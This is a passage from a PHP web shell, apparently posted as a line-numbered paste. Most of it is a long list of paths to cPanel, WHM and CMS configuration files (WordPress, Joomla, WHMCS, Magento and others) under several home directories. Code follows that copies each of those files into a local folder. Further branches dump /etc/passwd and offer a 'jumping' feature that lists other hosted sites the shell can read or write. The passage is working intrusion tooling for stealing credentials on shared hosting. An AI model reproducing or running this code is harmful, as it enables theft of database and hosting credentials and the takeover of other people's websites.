  3555. "/home/$user_spade/public_html/BETA/configuration.php" => "JoomlaBeta",
  3556. "/home/$user_spade/public_html/PRESS/configuration.php" => "JoomlaPress",
  3557. "/home/$user_spade/public_html/Press/configuration.php" => "JoomlaPress",
  3558. "/home/$user_spade/public_html/press/configuration.php" => "JoomlaPress",
  3559. "/home/$user_spade/public_html/Wp/configuration.php" => "JoomlaWp",
  3560. "/home/$user_spade/public_html/wp/configuration.php" => "JoomlaWp",
  3561. "/home/$user_spade/public_html/WP/configuration.php" => "JoomlaWP",
  3562. "/home/$user_spade/public_html/portal/configuration.php" => "JoomlaPortal",
  3563. "/home/$user_spade/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  3564. "/home/$user_spade/public_html/Portal/configuration.php" => "JoomlaPortal",
  3565. "/home/$user_spade/public_html/wp-config.php" => "WordPress",
  3566. "/home/$user_spade/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  3567. "/home/$user_spade/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  3568. "/home/$user_spade/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  3569. "/home/$user_spade/public_html/Home/wp-config.php" => "WordPressHome",
  3570. "/home/$user_spade/public_html/HOME/wp-config.php" => "WordPressHome",
  3571. "/home/$user_spade/public_html/home/wp-config.php" => "WordPressHome",
  3572. "/home/$user_spade/public_html/NEW/wp-config.php" => "WordPressNew",
  3573. "/home/$user_spade/public_html/New/wp-config.php" => "WordPressNew",
  3574. "/home/$user_spade/public_html/new/wp-config.php" => "WordPressNew",
  3575. "/home/$user_spade/public_html/News/wp-config.php" => "WordPressNews",
  3576. "/home/$user_spade/public_html/NEWS/wp-config.php" => "WordPressNews",
  3577. "/home/$user_spade/public_html/news/wp-config.php" => "WordPressNews",
  3578. "/home/$user_spade/public_html/Cms/wp-config.php" => "WordPressCms",
  3579. "/home/$user_spade/public_html/CMS/wp-config.php" => "WordPressCms",
  3580. "/home/$user_spade/public_html/cms/wp-config.php" => "WordPressCms",
  3581. "/home/$user_spade/public_html/Main/wp-config.php" => "WordPressMain",
  3582. "/home/$user_spade/public_html/MAIN/wp-config.php" => "WordPressMain",
  3583. "/home/$user_spade/public_html/main/wp-config.php" => "WordPressMain",
  3584. "/home/$user_spade/public_html/Blog/wp-config.php" => "WordPressBlog",
  3585. "/home/$user_spade/public_html/BLOG/wp-config.php" => "WordPressBlog",
  3586. "/home/$user_spade/public_html/blog/wp-config.php" => "WordPressBlog",
  3587. "/home/$user_spade/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  3588. "/home/$user_spade/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  3589. "/home/$user_spade/public_html/blogs/wp-config.php" => "WordPressBlogs",
  3590. "/home/$user_spade/public_html/beta/wp-config.php" => "WordPressBeta",
  3591. "/home/$user_spade/public_html/Beta/wp-config.php" => "WordPressBeta",
  3592. "/home/$user_spade/public_html/BETA/wp-config.php" => "WordPressBeta",
  3593. "/home/$user_spade/public_html/PRESS/wp-config.php" => "WordPressPress",
  3594. "/home/$user_spade/public_html/Press/wp-config.php" => "WordPressPress",
  3595. "/home/$user_spade/public_html/press/wp-config.php" => "WordPressPress",
  3596. "/home/$user_spade/public_html/Wp/wp-config.php" => "WordPressWp",
  3597. "/home/$user_spade/public_html/wp/wp-config.php" => "WordPressWp",
  3598. "/home/$user_spade/public_html/WP/wp-config.php" => "WordPressWP",
  3599. "/home/$user_spade/public_html/portal/wp-config.php" => "WordPressPortal",
  3600. "/home/$user_spade/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  3601. "/home/$user_spade/public_html/Portal/wp-config.php" => "WordPressPortal",
  3602. "/home1/$user_spade/.my.cnf" => "cpanel",
  3603. "/home1/$user_spade/.accesshash" => "WHM-accesshash",
  3604. "/home1/$user_spade/public_html/bw-configs/config.ini" => "BosWeb",
  3605. "/home1/$user_spade/public_html/config/koneksi.php" => "Lokomedia",
  3606. "/home1/$user_spade/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3607. "/home1/$user_spade/public_html/clientarea/configuration.php" => "WHMCS",
  3608. "/home1/$user_spade/public_html/whmcs/configuration.php" => "WHMCS",
  3609. "/home1/$user_spade/public_html/forum/config.php" => "phpBB",
  3610. "/home1/$user_spade/public_html/sites/default/settings.php" => "Drupal",
  3611. "/home1/$user_spade/public_html/config/settings.inc.php" => "PrestaShop",
  3612. "/home1/$user_spade/public_html/app/etc/local.xml" => "Magento",
  3613. "/home1/$user_spade/public_html/admin/config.php" => "OpenCart",
  3614. "/home1/$user_spade/public_html/slconfig.php" => "Sitelok",
  3615. "/home1/$user_spade/public_html/application/config/database.php" => "Ellislab",
  3616. "/home1/$user_spade/public_html/whm/configuration.php" => "WHMCS",
  3617. "/home1/$user_spade/public_html/whmc/WHM/configuration.ph" => "WHMC",
  3618. "/home1/$user_spade/public_html/central/configuration.php" => "WHM Central",
  3619. "/home1/$user_spade/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  3620. "/home1/$user_spade/public_html/whm/whmcs/configuration.php" => "WHMCS",
  3621. "/home1/$user_spade/public_html/submitticket.php" => "WHMCS",
  3622. "/home1/$user_spade/public_html/configuration.php" => "Joomla",
  3623. "/home1/$user_spade/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  3624. "/home1/$user_spade/public_html/joomla/configuration.php" => "JoomlaJoomla",
  3625. "/home1/$user_spade/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  3626. "/home1/$user_spade/public_html/Home/configuration.php" => "JoomlaHome",
  3627. "/home1/$user_spade/public_html/HOME/configuration.php" => "JoomlaHome",
  3628. "/home1/$user_spade/public_html/home/configuration.php" => "JoomlaHome",
  3629. "/home1/$user_spade/public_html/NEW/configuration.php" => "JoomlaNew",
  3630. "/home1/$user_spade/public_html/New/configuration.php" => "JoomlaNew",
  3631. "/home1/$user_spade/public_html/new/configuration.php" => "JoomlaNew",
  3632. "/home1/$user_spade/public_html/News/configuration.php" => "JoomlaNews",
  3633. "/home1/$user_spade/public_html/NEWS/configuration.php" => "JoomlaNews",
  3634. "/home1/$user_spade/public_html/news/configuration.php" => "JoomlaNews",
  3635. "/home1/$user_spade/public_html/Cms/configuration.php" => "JoomlaCms",
  3636. "/home1/$user_spade/public_html/CMS/configuration.php" => "JoomlaCms",
  3637. "/home1/$user_spade/public_html/cms/configuration.php" => "JoomlaCms",
  3638. "/home1/$user_spade/public_html/Main/configuration.php" => "JoomlaMain",
  3639. "/home1/$user_spade/public_html/MAIN/configuration.php" => "JoomlaMain",
  3640. "/home1/$user_spade/public_html/main/configuration.php" => "JoomlaMain",
  3641. "/home1/$user_spade/public_html/Blog/configuration.php" => "JoomlaBlog",
  3642. "/home1/$user_spade/public_html/BLOG/configuration.php" => "JoomlaBlog",
  3643. "/home1/$user_spade/public_html/blog/configuration.php" => "JoomlaBlog",
  3644. "/home1/$user_spade/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  3645. "/home1/$user_spade/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  3646. "/home1/$user_spade/public_html/blogs/configuration.php" => "JoomlaBlogs",
  3647. "/home1/$user_spade/public_html/beta/configuration.php" => "JoomlaBeta",
  3648. "/home1/$user_spade/public_html/Beta/configuration.php" => "JoomlaBeta",
  3649. "/home1/$user_spade/public_html/BETA/configuration.php" => "JoomlaBeta",
  3650. "/home1/$user_spade/public_html/PRESS/configuration.php" => "JoomlaPress",
  3651. "/home1/$user_spade/public_html/Press/configuration.php" => "JoomlaPress",
  3652. "/home1/$user_spade/public_html/press/configuration.php" => "JoomlaPress",
  3653. "/home1/$user_spade/public_html/Wp/configuration.php" => "JoomlaWp",
  3654. "/home1/$user_spade/public_html/wp/configuration.php" => "JoomlaWp",
  3655. "/home1/$user_spade/public_html/WP/configuration.php" => "JoomlaWP",
  3656. "/home1/$user_spade/public_html/portal/configuration.php" => "JoomlaPortal",
  3657. "/home1/$user_spade/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  3658. "/home1/$user_spade/public_html/Portal/configuration.php" => "JoomlaPortal",
  3659. "/home1/$user_spade/public_html/wp-config.php" => "WordPress",
  3660. "/home1/$user_spade/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  3661. "/home1/$user_spade/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  3662. "/home1/$user_spade/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  3663. "/home1/$user_spade/public_html/Home/wp-config.php" => "WordPressHome",
  3664. "/home1/$user_spade/public_html/HOME/wp-config.php" => "WordPressHome",
  3665. "/home1/$user_spade/public_html/home/wp-config.php" => "WordPressHome",
  3666. "/home1/$user_spade/public_html/NEW/wp-config.php" => "WordPressNew",
  3667. "/home1/$user_spade/public_html/New/wp-config.php" => "WordPressNew",
  3668. "/home1/$user_spade/public_html/new/wp-config.php" => "WordPressNew",
  3669. "/home1/$user_spade/public_html/News/wp-config.php" => "WordPressNews",
  3670. "/home1/$user_spade/public_html/NEWS/wp-config.php" => "WordPressNews",
  3671. "/home1/$user_spade/public_html/news/wp-config.php" => "WordPressNews",
  3672. "/home1/$user_spade/public_html/Cms/wp-config.php" => "WordPressCms",
  3673. "/home1/$user_spade/public_html/CMS/wp-config.php" => "WordPressCms",
  3674. "/home1/$user_spade/public_html/cms/wp-config.php" => "WordPressCms",
  3675. "/home1/$user_spade/public_html/Main/wp-config.php" => "WordPressMain",
  3676. "/home1/$user_spade/public_html/MAIN/wp-config.php" => "WordPressMain",
  3677. "/home1/$user_spade/public_html/main/wp-config.php" => "WordPressMain",
  3678. "/home1/$user_spade/public_html/Blog/wp-config.php" => "WordPressBlog",
  3679. "/home1/$user_spade/public_html/BLOG/wp-config.php" => "WordPressBlog",
  3680. "/home1/$user_spade/public_html/blog/wp-config.php" => "WordPressBlog",
  3681. "/home1/$user_spade/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  3682. "/home1/$user_spade/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  3683. "/home1/$user_spade/public_html/blogs/wp-config.php" => "WordPressBlogs",
  3684. "/home1/$user_spade/public_html/beta/wp-config.php" => "WordPressBeta",
  3685. "/home1/$user_spade/public_html/Beta/wp-config.php" => "WordPressBeta",
  3686. "/home1/$user_spade/public_html/BETA/wp-config.php" => "WordPressBeta",
  3687. "/home1/$user_spade/public_html/PRESS/wp-config.php" => "WordPressPress",
  3688. "/home1/$user_spade/public_html/Press/wp-config.php" => "WordPressPress",
  3689. "/home1/$user_spade/public_html/press/wp-config.php" => "WordPressPress",
  3690. "/home1/$user_spade/public_html/Wp/wp-config.php" => "WordPressWp",
  3691. "/home1/$user_spade/public_html/wp/wp-config.php" => "WordPressWp",
  3692. "/home1/$user_spade/public_html/WP/wp-config.php" => "WordPressWP",
  3693. "/home1/$user_spade/public_html/portal/wp-config.php" => "WordPressPortal",
  3694. "/home1/$user_spade/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  3695. "/home1/$user_spade/public_html/Portal/wp-config.php" => "WordPressPortal",
  3696. "/home2/$user_spade/.my.cnf" => "cpanel",
  3697. "/home2/$user_spade/.accesshash" => "WHM-accesshash",
  3698. "/home2/$user_spade/public_html/bw-configs/config.ini" => "BosWeb",
  3699. "/home2/$user_spade/public_html/config/koneksi.php" => "Lokomedia",
  3700. "/home2/$user_spade/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3701. "/home2/$user_spade/public_html/clientarea/configuration.php" => "WHMCS",
  3702. "/home2/$user_spade/public_html/whmcs/configuration.php" => "WHMCS",
  3703. "/home2/$user_spade/public_html/forum/config.php" => "phpBB",
  3704. "/home2/$user_spade/public_html/sites/default/settings.php" => "Drupal",
  3705. "/home2/$user_spade/public_html/config/settings.inc.php" => "PrestaShop",
  3706. "/home2/$user_spade/public_html/app/etc/local.xml" => "Magento",
  3707. "/home2/$user_spade/public_html/admin/config.php" => "OpenCart",
  3708. "/home2/$user_spade/public_html/slconfig.php" => "Sitelok",
  3709. "/home2/$user_spade/public_html/application/config/database.php" => "Ellislab",
  3710. "/home2/$user_spade/public_html/whm/configuration.php" => "WHMCS",
  3711. "/home2/$user_spade/public_html/whmc/WHM/configuration.ph" => "WHMC",
  3712. "/home2/$user_spade/public_html/central/configuration.php" => "WHM Central",
  3713. "/home2/$user_spade/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  3714. "/home2/$user_spade/public_html/whm/whmcs/configuration.php" => "WHMCS",
  3715. "/home2/$user_spade/public_html/submitticket.php" => "WHMCS",
  3716. "/home2/$user_spade/public_html/configuration.php" => "Joomla",
  3717. "/home2/$user_spade/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  3718. "/home2/$user_spade/public_html/joomla/configuration.php" => "JoomlaJoomla",
  3719. "/home2/$user_spade/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  3720. "/home2/$user_spade/public_html/Home/configuration.php" => "JoomlaHome",
  3721. "/home2/$user_spade/public_html/HOME/configuration.php" => "JoomlaHome",
  3722. "/home2/$user_spade/public_html/home/configuration.php" => "JoomlaHome",
  3723. "/home2/$user_spade/public_html/NEW/configuration.php" => "JoomlaNew",
  3724. "/home2/$user_spade/public_html/New/configuration.php" => "JoomlaNew",
  3725. "/home2/$user_spade/public_html/new/configuration.php" => "JoomlaNew",
  3726. "/home2/$user_spade/public_html/News/configuration.php" => "JoomlaNews",
  3727. "/home2/$user_spade/public_html/NEWS/configuration.php" => "JoomlaNews",
  3728. "/home2/$user_spade/public_html/news/configuration.php" => "JoomlaNews",
  3729. "/home2/$user_spade/public_html/Cms/configuration.php" => "JoomlaCms",
  3730. "/home2/$user_spade/public_html/CMS/configuration.php" => "JoomlaCms",
  3731. "/home2/$user_spade/public_html/cms/configuration.php" => "JoomlaCms",
  3732. "/home2/$user_spade/public_html/Main/configuration.php" => "JoomlaMain",
  3733. "/home2/$user_spade/public_html/MAIN/configuration.php" => "JoomlaMain",
  3734. "/home2/$user_spade/public_html/main/configuration.php" => "JoomlaMain",
  3735. "/home2/$user_spade/public_html/Blog/configuration.php" => "JoomlaBlog",
  3736. "/home2/$user_spade/public_html/BLOG/configuration.php" => "JoomlaBlog",
  3737. "/home2/$user_spade/public_html/blog/configuration.php" => "JoomlaBlog",
  3738. "/home2/$user_spade/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  3739. "/home2/$user_spade/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  3740. "/home2/$user_spade/public_html/blogs/configuration.php" => "JoomlaBlogs",
  3741. "/home2/$user_spade/public_html/beta/configuration.php" => "JoomlaBeta",
  3742. "/home2/$user_spade/public_html/Beta/configuration.php" => "JoomlaBeta",
  3743. "/home2/$user_spade/public_html/BETA/configuration.php" => "JoomlaBeta",
  3744. "/home2/$user_spade/public_html/PRESS/configuration.php" => "JoomlaPress",
  3745. "/home2/$user_spade/public_html/Press/configuration.php" => "JoomlaPress",
  3746. "/home2/$user_spade/public_html/press/configuration.php" => "JoomlaPress",
  3747. "/home2/$user_spade/public_html/Wp/configuration.php" => "JoomlaWp",
  3748. "/home2/$user_spade/public_html/wp/configuration.php" => "JoomlaWp",
  3749. "/home2/$user_spade/public_html/WP/configuration.php" => "JoomlaWP",
  3750. "/home2/$user_spade/public_html/portal/configuration.php" => "JoomlaPortal",
  3751. "/home2/$user_spade/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  3752. "/home2/$user_spade/public_html/Portal/configuration.php" => "JoomlaPortal",
  3753. "/home2/$user_spade/public_html/wp-config.php" => "WordPress",
  3754. "/home2/$user_spade/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  3755. "/home2/$user_spade/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  3756. "/home2/$user_spade/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  3757. "/home2/$user_spade/public_html/Home/wp-config.php" => "WordPressHome",
  3758. "/home2/$user_spade/public_html/HOME/wp-config.php" => "WordPressHome",
  3759. "/home2/$user_spade/public_html/home/wp-config.php" => "WordPressHome",
  3760. "/home2/$user_spade/public_html/NEW/wp-config.php" => "WordPressNew",
  3761. "/home2/$user_spade/public_html/New/wp-config.php" => "WordPressNew",
  3762. "/home2/$user_spade/public_html/new/wp-config.php" => "WordPressNew",
  3763. "/home2/$user_spade/public_html/News/wp-config.php" => "WordPressNews",
  3764. "/home2/$user_spade/public_html/NEWS/wp-config.php" => "WordPressNews",
  3765. "/home2/$user_spade/public_html/news/wp-config.php" => "WordPressNews",
  3766. "/home2/$user_spade/public_html/Cms/wp-config.php" => "WordPressCms",
  3767. "/home2/$user_spade/public_html/CMS/wp-config.php" => "WordPressCms",
  3768. "/home2/$user_spade/public_html/cms/wp-config.php" => "WordPressCms",
  3769. "/home2/$user_spade/public_html/Main/wp-config.php" => "WordPressMain",
  3770. "/home2/$user_spade/public_html/MAIN/wp-config.php" => "WordPressMain",
  3771. "/home2/$user_spade/public_html/main/wp-config.php" => "WordPressMain",
  3772. "/home2/$user_spade/public_html/Blog/wp-config.php" => "WordPressBlog",
  3773. "/home2/$user_spade/public_html/BLOG/wp-config.php" => "WordPressBlog",
  3774. "/home2/$user_spade/public_html/blog/wp-config.php" => "WordPressBlog",
  3775. "/home2/$user_spade/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  3776. "/home2/$user_spade/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  3777. "/home2/$user_spade/public_html/blogs/wp-config.php" => "WordPressBlogs",
  3778. "/home2/$user_spade/public_html/beta/wp-config.php" => "WordPressBeta",
  3779. "/home2/$user_spade/public_html/Beta/wp-config.php" => "WordPressBeta",
  3780. "/home2/$user_spade/public_html/BETA/wp-config.php" => "WordPressBeta",
  3781. "/home2/$user_spade/public_html/PRESS/wp-config.php" => "WordPressPress",
  3782. "/home2/$user_spade/public_html/Press/wp-config.php" => "WordPressPress",
  3783. "/home2/$user_spade/public_html/press/wp-config.php" => "WordPressPress",
  3784. "/home2/$user_spade/public_html/Wp/wp-config.php" => "WordPressWp",
  3785. "/home2/$user_spade/public_html/wp/wp-config.php" => "WordPressWp",
  3786. "/home2/$user_spade/public_html/WP/wp-config.php" => "WordPressWP",
  3787. "/home2/$user_spade/public_html/portal/wp-config.php" => "WordPressPortal",
  3788. "/home2/$user_spade/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  3789. "/home2/$user_spade/public_html/Portal/wp-config.php" => "WordPressPortal",
  3790. "/home3/$user_spade/.my.cnf" => "cpanel",
  3791. "/home3/$user_spade/.accesshash" => "WHM-accesshash",
  3792. "/home3/$user_spade/public_html/bw-configs/config.ini" => "BosWeb",
  3793. "/home3/$user_spade/public_html/config/koneksi.php" => "Lokomedia",
  3794. "/home3/$user_spade/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3795. "/home3/$user_spade/public_html/clientarea/configuration.php" => "WHMCS",
  3796. "/home3/$user_spade/public_html/whmcs/configuration.php" => "WHMCS",
  3797. "/home3/$user_spade/public_html/forum/config.php" => "phpBB",
  3798. "/home3/$user_spade/public_html/sites/default/settings.php" => "Drupal",
  3799. "/home3/$user_spade/public_html/config/settings.inc.php" => "PrestaShop",
  3800. "/home3/$user_spade/public_html/app/etc/local.xml" => "Magento",
  3801. "/home3/$user_spade/public_html/admin/config.php" => "OpenCart",
  3802. "/home3/$user_spade/public_html/slconfig.php" => "Sitelok",
  3803. "/home3/$user_spade/public_html/application/config/database.php" => "Ellislab",
  3804. "/home3/$user_spade/public_html/whm/configuration.php" => "WHMCS",
  3805. "/home3/$user_spade/public_html/whmc/WHM/configuration.ph" => "WHMC",
  3806. "/home3/$user_spade/public_html/central/configuration.php" => "WHM Central",
  3807. "/home3/$user_spade/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  3808. "/home3/$user_spade/public_html/whm/whmcs/configuration.php" => "WHMCS",
  3809. "/home3/$user_spade/public_html/submitticket.php" => "WHMCS",
  3810. "/home3/$user_spade/public_html/configuration.php" => "Joomla",
  3811. "/home3/$user_spade/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  3812. "/home3/$user_spade/public_html/joomla/configuration.php" => "JoomlaJoomla",
  3813. "/home3/$user_spade/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  3814. "/home3/$user_spade/public_html/Home/configuration.php" => "JoomlaHome",
  3815. "/home3/$user_spade/public_html/HOME/configuration.php" => "JoomlaHome",
  3816. "/home3/$user_spade/public_html/home/configuration.php" => "JoomlaHome",
  3817. "/home3/$user_spade/public_html/NEW/configuration.php" => "JoomlaNew",
  3818. "/home3/$user_spade/public_html/New/configuration.php" => "JoomlaNew",
  3819. "/home3/$user_spade/public_html/new/configuration.php" => "JoomlaNew",
  3820. "/home3/$user_spade/public_html/News/configuration.php" => "JoomlaNews",
  3821. "/home3/$user_spade/public_html/NEWS/configuration.php" => "JoomlaNews",
  3822. "/home3/$user_spade/public_html/news/configuration.php" => "JoomlaNews",
  3823. "/home3/$user_spade/public_html/Cms/configuration.php" => "JoomlaCms",
  3824. "/home3/$user_spade/public_html/CMS/configuration.php" => "JoomlaCms",
  3825. "/home3/$user_spade/public_html/cms/configuration.php" => "JoomlaCms",
  3826. "/home3/$user_spade/public_html/Main/configuration.php" => "JoomlaMain",
  3827. "/home3/$user_spade/public_html/MAIN/configuration.php" => "JoomlaMain",
  3828. "/home3/$user_spade/public_html/main/configuration.php" => "JoomlaMain",
  3829. "/home3/$user_spade/public_html/Blog/configuration.php" => "JoomlaBlog",
  3830. "/home3/$user_spade/public_html/BLOG/configuration.php" => "JoomlaBlog",
  3831. "/home3/$user_spade/public_html/blog/configuration.php" => "JoomlaBlog",
  3832. "/home3/$user_spade/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  3833. "/home3/$user_spade/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  3834. "/home3/$user_spade/public_html/blogs/configuration.php" => "JoomlaBlogs",
  3835. "/home3/$user_spade/public_html/beta/configuration.php" => "JoomlaBeta",
  3836. "/home3/$user_spade/public_html/Beta/configuration.php" => "JoomlaBeta",
  3837. "/home3/$user_spade/public_html/BETA/configuration.php" => "JoomlaBeta",
  3838. "/home3/$user_spade/public_html/PRESS/configuration.php" => "JoomlaPress",
  3839. "/home3/$user_spade/public_html/Press/configuration.php" => "JoomlaPress",
  3840. "/home3/$user_spade/public_html/press/configuration.php" => "JoomlaPress",
  3841. "/home3/$user_spade/public_html/Wp/configuration.php" => "JoomlaWp",
  3842. "/home3/$user_spade/public_html/wp/configuration.php" => "JoomlaWp",
  3843. "/home3/$user_spade/public_html/WP/configuration.php" => "JoomlaWP",
  3844. "/home3/$user_spade/public_html/portal/configuration.php" => "JoomlaPortal",
  3845. "/home3/$user_spade/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  3846. "/home3/$user_spade/public_html/Portal/configuration.php" => "JoomlaPortal",
  3847. "/home3/$user_spade/public_html/wp-config.php" => "WordPress",
  3848. "/home3/$user_spade/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  3849. "/home3/$user_spade/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  3850. "/home3/$user_spade/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  3851. "/home3/$user_spade/public_html/Home/wp-config.php" => "WordPressHome",
  3852. "/home3/$user_spade/public_html/HOME/wp-config.php" => "WordPressHome",
  3853. "/home3/$user_spade/public_html/home/wp-config.php" => "WordPressHome",
  3854. "/home3/$user_spade/public_html/NEW/wp-config.php" => "WordPressNew",
  3855. "/home3/$user_spade/public_html/New/wp-config.php" => "WordPressNew",
  3856. "/home3/$user_spade/public_html/new/wp-config.php" => "WordPressNew",
  3857. "/home3/$user_spade/public_html/News/wp-config.php" => "WordPressNews",
  3858. "/home3/$user_spade/public_html/NEWS/wp-config.php" => "WordPressNews",
  3859. "/home3/$user_spade/public_html/news/wp-config.php" => "WordPressNews",
  3860. "/home3/$user_spade/public_html/Cms/wp-config.php" => "WordPressCms",
  3861. "/home3/$user_spade/public_html/CMS/wp-config.php" => "WordPressCms",
  3862. "/home3/$user_spade/public_html/cms/wp-config.php" => "WordPressCms",
  3863. "/home3/$user_spade/public_html/Main/wp-config.php" => "WordPressMain",
  3864. "/home3/$user_spade/public_html/MAIN/wp-config.php" => "WordPressMain",
  3865. "/home3/$user_spade/public_html/main/wp-config.php" => "WordPressMain",
  3866. "/home3/$user_spade/public_html/Blog/wp-config.php" => "WordPressBlog",
  3867. "/home3/$user_spade/public_html/BLOG/wp-config.php" => "WordPressBlog",
  3868. "/home3/$user_spade/public_html/blog/wp-config.php" => "WordPressBlog",
  3869. "/home3/$user_spade/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  3870. "/home3/$user_spade/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  3871. "/home3/$user_spade/public_html/blogs/wp-config.php" => "WordPressBlogs",
  3872. "/home3/$user_spade/public_html/beta/wp-config.php" => "WordPressBeta",
  3873. "/home3/$user_spade/public_html/Beta/wp-config.php" => "WordPressBeta",
  3874. "/home3/$user_spade/public_html/BETA/wp-config.php" => "WordPressBeta",
  3875. "/home3/$user_spade/public_html/PRESS/wp-config.php" => "WordPressPress",
  3876. "/home3/$user_spade/public_html/Press/wp-config.php" => "WordPressPress",
  3877. "/home3/$user_spade/public_html/press/wp-config.php" => "WordPressPress",
  3878. "/home3/$user_spade/public_html/Wp/wp-config.php" => "WordPressWp",
  3879. "/home3/$user_spade/public_html/wp/wp-config.php" => "WordPressWp",
  3880. "/home3/$user_spade/public_html/WP/wp-config.php" => "WordPressWP",
  3881. "/home3/$user_spade/public_html/portal/wp-config.php" => "WordPressPortal",
  3882. "/home3/$user_spade/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  3883. "/home3/$user_spade/public_html/Portal/wp-config.php" => "WordPressPortal"
  3884. );
  3885. foreach($grab_config as $config => $nama_config) {
  3886. $ambil_config = file_get_contents($config);
  3887. if($ambil_config == '') {
  3888. } else {
  3889. $file_config = fopen("spade_config/$user_spade-$nama_config.txt","w");
  3890. fputs($file_config,$ambil_config);
  3891. }
  3892. }
  3893. }
  3894. }
  3895. echo "<center><a href='?dir=$dir/spade_config'><font color=lime>Done</font></a></center>";
  3896. }else{
  3897.  
  3898. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  3899. echo file_get_contents('/etc/passwd');
  3900. echo "</textarea><br><input type=\"submit\" value=\"Symlink that Sh!t\"></td></tr></center>\n";
  3901. }
  3902. } elseif($_GET['do'] == 'jumping') {
  3903. $i = 0;
  3904. echo "<center><h1 class='titulo'>JUMPING</h1></center><br>";
  3905. echo "<div class='margin: 5px auto;'>";
  3906. if(preg_match("/hsphere/", $dir)) {
  3907. $urls = explode("\r\n", $_POST['url']);
  3908. if(isset($_POST['jump'])) {
  3909. echo "<pre>";
  3910. foreach($urls as $url) {
  3911. $url = str_replace(array("http://","www."), "", strtolower($url));
  3912. $etc = "/etc/passwd";
  3913. $f = fopen($etc,"r");
  3914. while($gets = fgets($f)) {
  3915. $pecah = explode(":", $gets);
  3916. $user = $pecah[0];
  3917. $dir_user = "/hsphere/local/home/$user";
  3918. if(is_dir($dir_user) === true) {
  3919. $url_user = $dir_user."/".$url;
  3920. if(is_readable($url_user)) {
  3921. $i++;
  3922. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  3923. if(is_writable($url_user)) {
  3924. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  3925. }
  3926. echo $jrw."<br>";
  3927. }
  3928. }
  3929. }
  3930. }
  3931. if($i == 0) {
  3932. } else {
  3933. echo "<br>There are/is ".$i." Website/s on this Webserver: ".gethostbyname($_SERVER['HTTP_HOST']);
  3934. }
  3935. echo "</pre>";
  3936. } else {
  3937. echo '<center>
  3938. <form method="post">
  3939. List Domains: <br>
  3940. <textarea name="url" style="width: 500px; height: 250px;">';
  3941. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3942. while($getss = fgets($fp)) {
  3943. echo $getss;
  3944. }
  3945. echo '</textarea><br>
  3946. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3947. </form></center>';
  3948. }
  3949. } elseif(preg_match("/vhosts/", $dir)) {
  3950. $urls = explode("\r\n", $_POST['url']);
  3951. if(isset($_POST['jump'])) {
  3952. echo "<pre>";
  3953. foreach($urls as $url) {
  3954. $web_vh = "/var/www/vhosts/$url/httpdocs";
  3955. if(is_dir($web_vh) === true) {
  3956. if(is_readable($web_vh)) {
  3957. $i++;
  3958. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  3959. if(is_writable($web_vh)) {
  3960. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  3961. }
  3962. echo $jrw."<br>";
  3963. }
  3964. }
  3965. }
  3966. if($i == 0) {
  3967. } else {
  3968. echo "<br>There are/is ".$i." Website/s on this Webserver: ".gethostbyname($_SERVER['HTTP_HOST']);
  3969. }
  3970. echo "</pre>";
  3971. } else {
  3972. echo '<center>
  3973. <form method="post">
  3974. List Domains: <br>
  3975. <textarea name="url" style="width: 500px; height: 250px;">';
  3976. bing("ip:$ip");
  3977. echo '</textarea><br>
  3978. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3979. </form></center>';
  3980. }
  3981. } else {
  3982. echo "<pre>";
  3983. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3984. while($passwd = fgets($etc)) {
